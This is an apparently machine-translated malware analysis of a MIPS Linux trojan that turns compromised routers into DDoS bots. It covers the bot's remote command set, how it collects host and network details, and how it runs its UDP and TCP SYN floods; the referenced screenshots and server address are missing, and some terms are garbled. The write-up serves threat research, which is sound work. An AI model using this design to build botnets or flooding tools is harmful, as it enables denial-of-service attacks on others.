Explanation of the MIPS architecture Linux trojan for vromips

Explanation of the MIPS architecture Linux trojan for vromips

Most Windows operating systems are installed on PCs of individual users, while Linux systems are widely used on servers. Therefore, Linux systems have fewer Trojans than Windows systems. Due to the application limitations of the MIPS architecture, Linux trojans on the MIPS architecture are rare.

Recently, a group of Linux Trojans with MIPS architecture targeting routers have been found on the analysis platform of harbo. The trojan user first tries to intrude into the user's vro by exploiting vulnerabilities and other methods, and then embeds the trojan in the vro. The router implanted with a Trojan becomes a "zombie" and can receive control commands from remote servers to launch DDoS attacks against specified network IP addresses.

I. Basic Information

File Format: ELF System Platform: MIPS 32-bit System

Ii. Hazard Overview

Attackers can use remote commands to initiate flooding attacks.

 

Iii. Brief Analysis

MIPS api call method description:

The syscall parameter is an api serial number. In this sample, the system api is not called using the dynamic link library. The system api is encapsulated in the following method, and will not be repeated in subsequent analysis.

 

4170 the connect function is available in the table.

 

 

1. obtain IP address and route table information

First, initiate a connection to google.

 

Call getsockname to obtain the local IP address and save it.

 

After the connection is established, read the connection information in/proc/net/route and obtain the route table information.

 

 

2. Obtain the mac address through ioctl

Obtain the mac address using the ioctl command SIOCGIFHWADDR.

 

 

3. Connect to the remote server of a hacker

 

The remote server address is:

 

 

4. Receive and pre-process Remote Server commands

Accept the remote server information.

 

String segmentation and other preprocessing.

 

 

5. Final Remote Server COMMAND LINE PROCESSING

A. PING: ping the remote server to check whether the connection is valid.

 

Local processing: Send "PONG" to the remote server as a response.

 

B. GETLOCALIP: The local upload IP address is required by the remote server.

 

Local processing: the IP address obtained before the upload.

 

C. Source: The Source command is used to pass the attacked IP address to the local client and call atoi to transfer the target IP address from the string.

 

Local processing: initiate an attack and return the flooding information.

 

D. SUDP: Set the flooding Attack Mode

 

Local processing: As shown in, select tcp and udp Attack methods based on whether the SUDP command is received.
The udp Attack method fork sub-processes, sleep according to the time sent from the server, and then calls sendto to send data to the target for flooding.

 

E. SYN: Use the TCP syn flooding command word (this command word is invalid in SUDP Mode)

 

Local processing: Enter the branch for sending syn. In tcp attack mode, create a socket for SOCK_RAW and set the socket to IPPROTO_IP layer for transmission.

 

Fill in the IP header by yourself.

 

Calculate the tcp Checksum.

 

The final method for sending this packet is the same as udp flooding.

F. KILLATTK: Stop the flooding attack.

 

Local processing: flooding attacks all adopt the fork sub-process method, so stopping the attack means killing the sub-process from the fork.

 

Send a message to the remote server that successfully kills the sub-process and stops the flooding attack.

 

G. LOLNOGTFO: the remote server must restore the initial state of the Trojan client because it does not obtain the corresponding response data or stops the attack.

 

Local processing: if the attack sub-process has been killed, get the LOLNOGTFO to reset the initial status. If the obtained result is not LOLNOGTFO, it indicates that the communication between the trojan client and the remote server is incorrect, the trojan client process is directly returned.